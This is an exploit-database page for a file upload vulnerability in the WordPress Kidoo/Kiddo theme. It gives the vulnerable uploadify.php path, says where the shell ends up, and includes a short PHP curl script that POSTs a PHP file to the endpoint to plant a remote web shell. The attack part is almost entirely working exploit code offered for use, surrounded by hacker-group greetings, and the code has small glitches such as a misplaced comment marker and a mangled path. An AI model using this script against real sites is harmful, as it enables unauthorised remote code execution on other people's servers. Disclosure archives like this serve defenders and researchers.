WordPress Kidoo theme suffers from a remote shell upload vulnerability.
6771aaba630fab4ccb442fa05071c0b7b7da1eb2727d602aa333c04d02665afb<?php
*/
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork: :(
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com
Kiddo WP theme suffers from a File Upload Vulnerability
+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php
+Shell Path:
site/3vil.php
ScreenShot:
http://i.imgur.com/c62cWHH.png
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
E4A Members:
Gastro-DZ
*/
echo "=============================================== \n";
echo " Kiddo WP Theme File Upload Vulnerability\n";
echo " TUNISIAN CYBER \n";
echo "=============================================== \n\n";
$uploadfile="cyber.php";
$ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed